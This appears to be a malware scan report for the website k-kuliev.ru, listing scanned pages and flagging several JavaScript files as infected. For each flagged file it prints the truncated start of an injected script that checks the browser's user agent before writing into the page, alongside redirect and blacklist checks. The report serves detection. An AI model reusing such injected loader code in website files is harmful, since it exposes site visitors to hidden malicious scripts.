Scanned pages/files
Request | Server response | Status |
http://www.k-kuliev.ru/ | 200 OK Content-Length: 45053 Content-Type: text/html | clean |
http://www.k-kuliev.ru/media/system/js/caption.js | 200 OK Content-Length: 8172 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen if ( element.title != "" ) { container.appendChild(text); } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); Antivirus reports:
| ||
http://www.k-kuliev.ru/plugins/content/mavikthumbnails/highslide/highslide-with-gallery.packed.js | 200 OK Content-Length: 42966 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen Antivirus reports:
| ||
http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/addons/base.js | 200 OK Content-Length: 7980 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen Antivirus reports:
| ||
http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 7560 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen Antivirus reports:
| ||
http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/addons/fancymenu.js | 200 OK Content-Length: 8876 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen Antivirus reports:
| ||
http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 9033 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen Antivirus reports:
| ||
http://www.k-kuliev.ru/templates/yoo_royalplaza/lib/js/template.js | 200 OK Content-Length: 8809 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen YOOBase.matchHeight('div.maintopbox div.deepest', 20); YOOBase.matchHeight('div.mainbottombox div.deepest', 20); YOOBase.matchHeight('div.contenttopbox div.deepest', 20); YOOBase.matchHeight('div.contentbottombox div.deepest', 20); YOOBase.matchHeight('#left, #right, #contentleft, #contentright', 20); } } }; window.addEvent('domready', YOOTemplate.start); Antivirus reports:
| ||
http://www.k-kuliev.ru/plugins/content/s5_mp3_player/s5_mp3_player.js | 200 OK Content-Length: 6920 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen arMP3Players.push(playerID); if(autostart == "1" && !bMP3PlayerStarted){ bMP3PlayerStarted = true; setTimeout("document.getElementById('"+playerID+"').autostart()",100); } } function stopMP3Players(playerID){ for(i=0;i<arMP3Players.length;i++){ if(playerID != arMP3Players[i]){ document.getElementById(arMP3Players[i]).stopPlayer(); } } } Antivirus reports:
| ||
http://www.k-kuliev.ru/biography/autobiography.html | 200 OK Content-Length: 50723 Content-Type: text/html | clean |
http://www.k-kuliev.ru/biography/nagr.html | 200 OK Content-Length: 74534 Content-Type: text/html | clean |
http://www.k-kuliev.ru/biography/pam.html | 200 OK Content-Length: 45162 Content-Type: text/html | clean |
http://www.k-kuliev.ru/plugins/content/yoo_gallery/lib/lightbox/slimbox_packed.js | 200 OK Content-Length: 10426 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){documen Slimbox.scanPage = function() { var links = $$("a").filter(function(el) { return el.rel && el.rel.test(/^lightbox/i); }); $$(links).slimbox({}, null, function(el) { return (this == el) || ((this.rel.length > 8) && (this.rel == el.rel)); }); }; window.addEvent("domready", Slimbox.scanPage); Antivirus reports:
| ||
http://www.k-kuliev.ru/poem/sobr1.html | 200 OK Content-Length: 66305 Content-Type: text/html | clean |
http://www.k-kuliev.ru/poem/sobr2.html | 200 OK Content-Length: 101837 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: k-kuliev.ru
Result:
GET / HTTP/1.1
Host: k-kuliev.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: k-kuliev.ru
Referer: http://www.google.com/search?q=k-kuliev.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: k-kuliev.ru
Referer: http://www.google.com/search?q=k-kuliev.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=k-kuliev.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://k-kuliev.ru/
Result: k-kuliev.ru is not infected or malware details are not published yet.
Result: k-kuliev.ru is not infected or malware details are not published yet.